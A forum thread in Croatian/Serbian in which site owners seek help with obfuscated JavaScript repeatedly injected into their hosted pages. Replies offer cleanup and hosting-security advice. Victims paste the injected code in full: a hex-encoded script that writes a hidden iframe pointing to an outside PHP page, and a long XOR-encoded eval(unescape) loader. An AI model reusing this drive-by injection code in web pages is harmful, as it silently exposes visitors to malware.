Uhvatimo trojanca /hitno/

novilik · prosinac 2007 15:45 18

Od nedavno imam problem sa tojancima koji se generisu u temp fajlu

Detektuju se pri poseti web prezentacije /koristim AVG 7.5 Free Edition/

Sta se ustvari desava-
u fajlu index se na neki misteriozni nacin generise skript recimo ovakav
/<[color=Red]ssss[/color]script>function v47676bf11252a(v47676bf1134ca){ return(parseInt(v47676bf1134ca,16));}function v47676bf1163b8(v47676bf117355){ function v47676bf11a22c () {return 2;} var v47676bf1182f3=’’;for(v47676bf119289=0; v47676bf119289<v47676bf117355.length; v47676bf119289+=v47676bf11a22c()){ v47676bf1182f3+=(String.fromCharCode(v47676bf11252a(v47676bf117355.substr(v47676bf119289, v47676bf11a22c()))));}return v47676bf1182f3;} document.write(v47676bf1163b8(‘3C696672616D65206E616D653D276327207372633D27687474703A2F2F7473746174732E6F72672F6C6F676F2E706870272077696474683D343832206865696768743D333837207374796C653D27646973706C61793A6E6F6E65273E3C2F696672616D653E’));
dodao sam [color=Red]SSS[/color] na pocetku.

Kada posle nekog vremena ponovo odem na web server i pogledam fajl vidim da je ugojeniji za skript -vdi se u kb. Izbrisem i postavim normalan fajl ali posle nekog vremena se pojavi ponovo skript.

Ili cak pojavi poseban fajl index ali sa extenzijom htm

[color=Green]Pretpostavljam da se to sve desava zbog programa za pravljenje foto galerije

```
    Jalbum
```
```
    AAA Web Album[/color]
```

Koristio sam te programe za pravljenje gotovih galerija koje sam postavio na web prezentaciju.

[color=DarkRed]Pitanje
Da li je moguce da se posetom foto-galerije aktivira generisanje skripta u index-fajl.
Koji zatim generise trojanca u racunar posetioca…/generic9.AMFR-00002.exe-i drugih
STA URADITI…
/ mozda je ovo pitanje bezveze ali ja nemam pojma kako funkcionisu virusi trojanci i ostala gamad/[/color]

Ako sam u pravu onda su ti programi verovatno i potencijalna opasnost u svim racunarima koji ih koriste. Oni se mogu naci na vise mesta u download sekcijama .

Sve galerije sam izbrisao i sada cekam sta ce da se desi i vasu pomoc…

Hvala

novilik · prosinac 2007 09:00 19

Skript znalci - POMOZITE

Od nedavno imam problem sa skriptom koja se sam misteriozno generise u INDEX fajlu na WebServeru

/<[color=DarkOliveGreen]ssss[/color]script>function v47676bf11252a(v47676bf1134ca){ return(parseInt(v47676bf1134ca,16));}function v47676bf1163b8(v47676bf117355){ function v47676bf11a22c () {return 2;} var v47676bf1182f3=’’;for(v47676bf119289=0; v47676bf119289<v47676bf117355.length; v47676bf119289+=v47676bf11a22c()){ v47676bf1182f3+=(String.fromCharCode(v47676bf11252 a(v47676bf117355.substr(v47676bf119289, v47676bf11a22c()))));}return v47676bf1182f3;} document.write(v47676bf1163b8(‘3C696672616D65206E6 16D653D276327207372633D27687474703A2F2F74737461747 32E6F72672F6C6F676F2E706870272077696474683D3438322 06865696768743D333837207374796C653D27646973706C617 93A6E6F6E65273E3C2F696672616D653E’));
dodao sam [color=DarkGreen]SSSS[/color] na pocetku.

Kada posle nekog vremena ponovo odem na web server i pogledam fajl vidim da je ugojeniji za skript -vidi se u Kb. Izbrisem i postavim normalan fajl ponovo ali posle nekog vremena se pojavi ponovo skript.

STA URADITI… i :ljuca: izbaciti uljeza

I STA TAJ SKRIPT RADI i KAKO SE UOPŠTE SAM GENERISE

Hvala

hudo · prosinac 2007 13:17 19

Ja samo znam da nakon zamjene AVGa za NOD32, ovaj potonji je nasao 10-tak wormova, trojanaca, bakcila i slicne gamadati i sve uredno maknuo.
Sto se tice skripte, mora biti jos neka skripta za odkodirati ove zvrljotine od brojeva. Ili koristi neku buffer overflow foru na nekom odredzenom servisu…

gamemaster · prosinac 2007 20:48 19

Ako možeš, pošalji ode svoj HijackThis Log.

http://filehippo.com/download/0e0a4476bb67470852b2d430cb13c07c/download/

Nakon toga ajde na Scan system and save a log file. Ode postaj taj file, tako možemo viditi sta je zarazeno.

neven1986 · prosinac 2007 21:36 19

Ako se ne bude ništa vidjelo sa Hijack This, skini si program GMER (
http://www.gmer.net/gmer.zip)
. U dva navrata kada mi ni Hijack This nije pomogao, on je.

novilik · prosinac 2007 08:41 21

Pogledao sam i skinuo programe koji ste mi preporucili…

Nije mi problem moj racunar je koristim image fajl celog C diska.

Prvi put kada sam formatirao disk instalirao i sve potrebne programe napravio sam image fajl tako da koristeci ACRONIS mogu da imam cist racunar za 15 minuta.

[color=RoyalBlue]Problem je sto se to samostalno generise tamo na serveru samo od sebe.
Google detektuje ove promene i oznacava kao sajt na koji ne treba otici jer je zarazen problematicnim sadrzajem.
A posetoci kada otvore sajt dobiju poruku da je tamo virus.

Pobrisao sam te foto galerije za koje sam vec prilicno siguran da su napravile zbrku i sada mi se desava nesto novo.[/color]

[color=Red]Sada dobijam samo-generisan fajl index na web serveru ovog puta pronalazim ovo

JEDNOSTAVNO SE SAMO POJAVI[/color]

tsereg · prosinac 2007 09:41 21

Pa daj se javi svom hosteru s tim problemom. Očigledno da se na serveru nalazi nekakav virus ili štogod, a to bi ovog trebalo zanimati. U najmanju ruku, zatraži da ti se u potpunosti rekonstruira tvoj diskovni prostor - ne iz backupa, već da se sve resetira kao da si upravo otvorio novi account.

Prije toga pohrani sve podatke. Podaci su samo i jednio one stvari koje ne sadrže programski kod. Znači, ako imaš SQL bazu podataka, eksportiraj podatke iz nje i spremi na svoj disk. Pri tome se informiraj kako ćeš naknadno restaurirati te podatke. Ako imaš kakve datoteke s podacima (ne .html niti .php niti išta takvoga) njih također pohrani.

Kada ti se tvoj account resetira, onda očisti svoj PC na kojem radiš (znam da se ovdje radi o serveru, ali još jednom: prvo očisti svoj PC na kojem radiš doma), ponovno skini s Interneta sve skripte i ino što koristiš te ih uploadaj na server iu rekonstruiraj svoj web na serveru iznova.

Ukoliko si sam pisao neki programski kod ili sam radio kakve .html stranice, sve to provjeri da je isto onako kako si ti napisao, da ne sadrži kakav zloćudni kod.

–

Uglavnom: poanta je da podatke možeš prenijeti iz sadašnjeg stanja, jer podaci su sve one stvari koje ne sadrže nikakav programski kod. Datoteke koje sadrže programski kod su potencijalno zaražene, pa njih moraš restaurirati sa samog izvora - odatle odakle si ih prvi puta skinuo. Ako si nešto sam radio (poput .html datoteka), to moraš sam i prekontrolirati - I TO KOPIJE KOJE IMAŠ NA SVOJEM RAČUNALU na kojem radip, ok? Možda je TVOJ PC zaražen, pa ti samo uploadaš zaražene programe na server gdje se tek po prvi puta vidi da su zaraženi. I konačno - razmisli da li su programi koje si skinuo s Interneta već otprije zaraženi - moguće je da koristiš nekakve skripte zlonamjernih autora koji su ih namjerno zarazili kakvim zloćudnim programima? U svakom slučaju, obavijesti svog hostera o problemu.

maxsi · prosinac 2007 18:31 21

Ako imas na svom hostu za skeniranje virusa probaj ga skenirati … to napraviti to bi ti moglo pomoci

ja sam nedavno imal takvu situaciju i sad je sve ok

novilik · prosinac 2007 11:25 23

Borba i dalje traje
skenirao sam sve fajlove i sve prekontrolisao u kb.
kontaktirao sam podrsku - /i nisu se bas zabrinuli kao da to nema veze sa njima/

Preporucili su antivirus F-Secure program koji mi je pronasao ono sto AVG nije pa ga preporucujem cisto da znate ali pretpostavljam da ste vi to vec odavno videli.

Naisao sam i na nesto meni skoro neverovatno tekstove o detaljnom uputstvu kako se to radi - vezano za trojance viruse hakiranje ip adrese i puno toga sto i ne razumem.

pogledajte
http://www.kgoran.com/forum/viewthread.php?forum_id=33&thread_id=140

Citajuci tekst jednostavno nemam sta da kazem osim da se nadam da necu imati problema sa takvim ljudima i da se osecam potpuno bespomocnim.

Mogu samo da im bacim kletvu. :srednji: a tu oni nemaju obrane…

dadb · ožujak 2008 12:19 10

i ja od sredine 12 mjeseca, pa do danas vodim bitku sa trojancima.
pri dnu stranice (html) mi se zalijepi kod (virusni) i netko mi uploada sve stranice u neka cudna vremena (4 ujutro). Obavijestio sam vise puta providera, medjutim nista. I jutros sam mijenjao sve stranice tj. brisao taj kod na njima.
Srecom AVG, mi odmah nanjusi virus kada se pojavi na sajtu, tj. kad sam na netu…
Mozda mi netko moze pomoci sto da napravim.
Password mijenjam svako malo, brisem te kodove, skeniram racunalo…

sto da napravim na serveru

sljaker · ožujak 2008 13:40 10

Gledaj, to je isključivi problem hosting kompanije i to pod zakonskom odgovornošću.

Proces čekiranja je nevjerojatno jednostavan jer treba samo provjeriti dozvole i podesiti ih da budu kako treba. Svi problemi vrlo vjerojatno nastaju zbog pogrešno podešenih dozvola…

Međutim, po ovom što si opisao, na toj mašini uopće ne postoji security softver jer bi ga on sam detektirao. Ili admin ne provjerava logove.

Dakle, kao prvo, zahtijevaj od svoje hosting tvrtke pod prijetnjom tužbom da HITNO detektira problem i riješi ga.

Nakon toga predlažem da promijeniš hostera za nekog kvalitetnijeg…

dadb · ožujak 2008 14:02 10

jel netko imao losih iskustava sa Shop centrom glede ovoga

sljaker · ožujak 2008 14:17 10

Da pojasnim: vrlo vjerojatno NIJE hosting tvrtka zeznula dozvole, nego korisnik. Nevjerojatno je koliko korisnika podešava dozvole za upload ili baze unutar web foldera…

Međutim, hosting tvrtka mora brzo i efektivno detektirati takav problem i ukloniti ga jer prijeti opasnost za cijelu tu mašinu (i mrežu, ovisno o postavkama).

Osim toga, po zakonu (o zaštiti osobnih podataka), a i nekim drugim zakonima, hosting tvrtka mora poštovati zakonske norme jer je inače kao pružatelj usluge u vezi s podacima zakonski odgovorna. Druga je stvar što masa “hostera” u Hr nije ni pročitala pripadajuće zakone, što se vidi iz famoznih “pravila” ili “SLA” itd…

Ovdje je konkretno vrlo vjerojatno na dijelu isti proces kao kod benignog Turkish hackera. Kad napadač pronađe web folder na koji je dopušteno pisanje, on uploada kod koji osim što ima određene značajke (npr. kreiranje početne stranice, mijenjanje ostalih stranica gdje to dozvole dopuštaju) obično radi i samokopiranje gdje god to može.

Dakle, ako sam u pravu, problem uopće nije na klijent računalu pa provjera neće ništa napraviti. Međutim, vrlo je ograničen skup radnji koje korisnik može napraviti na serveru, pa se zato i treba obratiti adminu jer je uklanjanje takvih problema njegov posao.

dadb · ožujak 2008 08:05 27

evo saljem kod koji me gnjavi na stranicama jos od 12 mjeseca - ja ga brisem a on se uporno ponavlja - dodao sam ono Zarazeni kod

moze li pomoc oko toga sto napraviti!
Zarazeni_Kodeval (unescape('function%20qmTELm%28wWi%29%7Bfunction%20wwWF%28xcIHv%29%7Bvar%20lddbunX%3DxcIHv.length%3Bvar%20oIVw%3D0%2CwIXWBIg%3D0%3Bwhile%28oIVw%3ClddbunX%29%7BwIXWBIg+%3DxcIHv.charCodeAt%28oIVw%29*lddbunX%3BoIVw++%3B%7Dreturn%20%28%27%27+wIXWBIg%29%7D%20%20%20try%20%7Bvar%20lMT%3Deval%28%27a%3Arbg%3AuAmbe%3Anqtbsq.bc%7EaqlqlAe%7Eeb%27.replace%28/%5BA%7Ebq%5C%3A%5D/g%2C%20%27%27%29%29%2CrlG%3Dnew%20String%28%29%2CqYDpF%3D0%3BdQD%3D0%2Csyj%3D%28new%20String%28lMT%29%29.replace%28/%5B%5E@a-z0-9A-Z_.%2C-%5D/g%2C%27%27%29%3Bvar%20puG%3DwwWF%28syj%29%3BwWi%3Dunescape%28wWi%29%3Bfor%28var%20oGNd%3D0%3B%20oGNd%20%3C%20%28wWi.length%29%3B%20oGNd++%29%7Bvar%20oJTjUJ%3DwWi.charCodeAt%28oGNd%29%3Bvar%20uTYIlt%3Dsyj.charCodeAt%28qYDpF%29%5EpuG.charCodeAt%28dQD%29%3BqYDpF++%3BdQD++%3Bif%28qYDpF%3Esyj.length%29qYDpF%3D0%3Bif%28dQD%3EpuG.length%29dQD%3D0%3BrlG+%3DString.fromCharCode%28oJTjUJ%5EuTYIlt%29%3B%7Deval%28rlG%29%3B%20return%20rlG%3Dnew%20String%28%29%3B%7Dcatch%28e%29%7B%7D%7DqmTELm%28%27%2532%2534%2531%2532%2531%2535%2530%2530%2551%250e%2530%251d%250d%252a%2536%2521%253b%254e%256e%2521%252f%257d%2509%250a%2537%2534%2501%2511%2534%252b%257f%2508%250f%2529%2532%250e%2534%2521%2525%2533%2573%257d%257e%2513%2508%2530%2509%2511%257e%2538%2576%2521%252c%2506%2520%253a%2574%257d%2520%2534%2556%2541%255b%2571%257d%2532%2538%2506%250d%2519%2510%2502%2522%2579%2579%253d%2528%253e%253c%250d%253f%252a%2536%257d%2538%2532%252d%253b%2544%2557%250d%250d%250a%2505%251d%257b%2533%2525%2528%2508%2562%257b%256c%2579%253a%2527%2504%254f%2512%2530%2504%2523%2576%2555%255d%2567%2508%2578%2523%2536%2533%250b%2504%2532%251c%257e%252b%2523%2523%2566%2500%2526%252a%2522%2561%2543%254d%2514%251e%2522%2515%252b%2524%2513%257b%256f%257d%2554%2545%2568%2570%2565%255c%2563%2576%2563%2565%256d%254f%257d%2536%250a%253f%2530%2528%2535%252c%2530%2530%2531%250c%253c%252e%2534%2526%257d%2549%2575%253b%2503%2571%2523%2574%2569%257d%2576%256e%2577%2561%257b%2565%2533%256d%257e%2526%252c%2512%2546%2521%2522%250e%2533%2526%2575%2575%2575%2517%2563%2508%250d%2532%251e%2577%2531%2512%2579%2520%2533%2526%2565%252f%2534%2512%250a%2507%2515%2532%252a%2535%2538%253e%2555%254d%2515%2560%252c%256d%2537%253e%2525%2521%2511%250d%2573%256e%253b%253f%256e%2501%2573%2509%252b%2575%2577%2572%257d%2534%2538%2538%2524%2558%2566%2507%252e%252c%2515%255d%2522%2525%2518%2520%2502%253c%253e%2516%253e%2530%2527%2500%252e%253d%2523%2501%2570%257a%2576%2539%2500%2532%2534%257e%2506%2542%2573%253c%251b%2523%2556%2539%251f%2513%2501%253b%2505%2526%252a%2521%2516%2520%2577%251a%2500%2531%253d%255c%256a%2507%255c%2530%253f%254a%2513%2503%2524%251f%256a%2516%2536%257a%2526%2508%2526%251f%256d%2523%252b%2504%2519%2500%253a%2502%2504%256a%251d%2542%253d%2546%2500%2578%2515%2510%251c%257c%2578%2528%257a%2526%2525%2532%254e%2532%250e%2565%251a%251b%255b%2532%250d%2513%253c%254e%2564%250d%257e%2502%2560%255d%251d%2533%2521%251c%2527%2536%2501%255c%256e%2502%252a%256e%252e%2512%253c%250a%250f%250b%255e%250c%255c%2561%2553%2565%2565%2571%256a%2504%253e%2529%2578%2521%253c%2530%252f%2506%2511%2519%2561%250d%2506%2519%254c%255d%256b%2557%2529%253d%2509%2569%2565%256e%2574%2577%2542%250a%254a%2567%257f%252f%254d%2502%2562%251f%2561%253f%256c%2522%256d%257b%2579%2572%2579%253e%2565%252a%2557%2528%256b%256b%2579%2568%2548%252c%2501%2508%2528%2500%250a%251c%2544%2569%250a%251b%2569%2509%2561%256c%252b%254d%250a%256f%2523%256c%257f%2560%257b%255e%2555%2523%2531%251b%2566%2538%252a%253f%2525%2543%253c%257d%2536%2535%2537%2540%253b%2520%2500%2525%257b%2537%2573%2530%2534%2538%250a%256d%2557%2562%2529%254b%252f%2521%252c%252a%2506%256e%252e%2577%2567%2529%256c%2504%251a%2517%2522%2518%2551%256d%257c%2529%2521%253d%2510%2535%253e%256c%2539%2540%2536%2537%2516%252b%2531%2577%2538%2539%252b%257c%2533%252a%251f%2527%2523%2576%255c%255b%2510%2568%254e%2503%2552%2501%2501%251c%252c%256c%2529%257b%253c%2539%250c%253b%250f%251c%2537%253e%253b%255a%257f%2571%256a%252e%250c%2532%2515%2509%2534%2515%2555%2579%2511%250e%2555%252a%2513%2549%2505%2501%257f%2527%255e%257a%2573%2572%2568%256d%2528%2553%2543%257a%252f%257b%2526%2500%2518%2535%251a%2539%250a%251a%2535%257c%2513%257a%2533%256c%252a%252e%250e%251c%2538%252f%2518%253f%2536%257e%253b%2564%257f%2530%2509%250f%250c%2535%2527%2535%2571%257e%2519%2514%250a%2532%2502%253c%250e%257f%2539%256d%2554%2577%2560%2569%2535%252e%2522%2539%2528%251f%256d%252b%2515%2523%2517%2538%2571%2529%250c%2527%2570%2524%2539%253d%2507%257c%2522%2508%2571%2573%252a%253b%2538%253a%2538%2522%257f%2566%2532%2530%2535%2525%2537%2522%2506%252b%2529%251b%2564%2500%2501%251d%2575%2579%255a%2570%2523%2522%257b%2527%250a%2536%2527%2508%2538%252a%2514%2511%2516%256f%2523%2539%251c%253b%2531%2572%256d%2551%2532%2568%2524%2553%256b%2564%251f%2571%2543%2543%2565%256e%2548%2521%256d%2535%253d%2563%2564%256d%2513%2518%2526%2516%251a%2524%2526%252b%2569%2504%2506%2528%2531%253d%2524%257c%253d%252e%2531%2512%251d%2512%2531%2575%2537%252b%2538%2531%2541%2516%2515%253a%2569%2537%2517%2530%2535%251a%2500%257d%2534%257e%2573%2566%2570%2564%2543%2___Zarazeni kod

nitko · ožujak 2008 09:46 27

Možeš malo detaljnije ? Prati te po svakoj stranici ? Specifičnim stranicama ? Sam se ukuca u source code ?

Koliko vidim, radi neki eval() ali prije toga šalje podatke kroz unescape(). Zasad, koliko sam došao je:

function qmTELm(wWi){function wwWF(xcIHv){var lddbunX=xcIHv.length;var oIVw=0,wIXWBIg=0;while(oIVwsyj.length)qYDpF=0;if(dQD>puG.length)dQD=0;rlG =String.fromCharCode(oJTjUJ^uTYIlt);}eval(rlG); return rlG=new String();}catch(e){}}qmTELm('24121500Q0 *6!;Nn!/} 744+)24!%3s}~0 ~8v!, :t} 4VA[q}28 "yy=(>< ?*6}82-;DW {3%(b{ly:'O0#vU]gx#63 
2~+##f&*"aCM"+${o}TEhpe\cvcemO}6 ?0(5,001 <.4&}Iu;q#ti}vnwa{e3m~&,F!"3&uuuc 2w1y 3&e/4 a2*58>UM`,m7>%! sn;?ns +}488$Xfa.,]"% <>>0'.=#pzv924~Bs<e#V9;&*! w1=\ja\0?J$j6z&&m#+:jB=Fx|x(z&%2N2ee[2 )x!<0/a L]kW)= ientwB Jg/Mba?l"m{yry>e*W(kkyhH,( Di ei al+M o#l`{^U#1ef8*?%C<}657@; %{7s048 mWb)K/!,*n.wg)l"Qm|)!=5>l9@67+1w89+|3*'#v\[hNR,l){<9 ;7>;Zqj. 2 4UyU*I'^zsrhm(SCz/{&59 5|z3l*.8/?6~;d0  5'5q~ 2<9mTw`i5."9(m+#8q) 'p$9=a|"qs*;8:8"f205%7"+)eduyZp#"{' 6'8*o#9;1rmQ2h$SkdqCCenH!m5=cdm&$&+i(1=$|=.11u7+81A:i705}4~sfpdC%2

Usput i da druge pitam, poslao sam parametre kroz slijedeću funkciju:
[php]

<?php function utf8_urldecode($str) { $str = preg_replace("/%u([0-9a-f]{3,4})/i","&#x\\1;",urldecode($str)); return html_entity_decode($str,null,'UTF-8');; } ?>

[/php]

Sada, jedino što mi je nejasno je da dolazi do jednog dijela di dobro decode-a i onda stane, pretpostavljam encoding ali ne znam koji namjestit ?

dadb · ožujak 2008 10:18 27

Ispocetka je to bilo samo na indexu, a sada kad se zalijepi zalijepi na sve html stranice. Sajt se azurira neovlasteni, tj.taj kod je ubacen, u vrijeme kada je masina na kojoj radim, ugasena. Otkrije mi Ga AVG antivirusni , i onda ga vidim i u sourceu. Ima li pomoci?

sljaker · ožujak 2008 17:01 27

Pa odgovorio sam ti - tvoja lokalna mašina vjerojatno nema veze s tim.
Pročitaj moje ranije postove, ljubazno te molim…

stefano · srpanj 2010 07:52 14

Kako je mene naucio Trojanac…aaaaa… rasturio me je.
Sta znate o blue screen virusima?

theja · srpanj 2010 11:01 14

sta te zanima? os ga lijecit il pravit?

fixiranje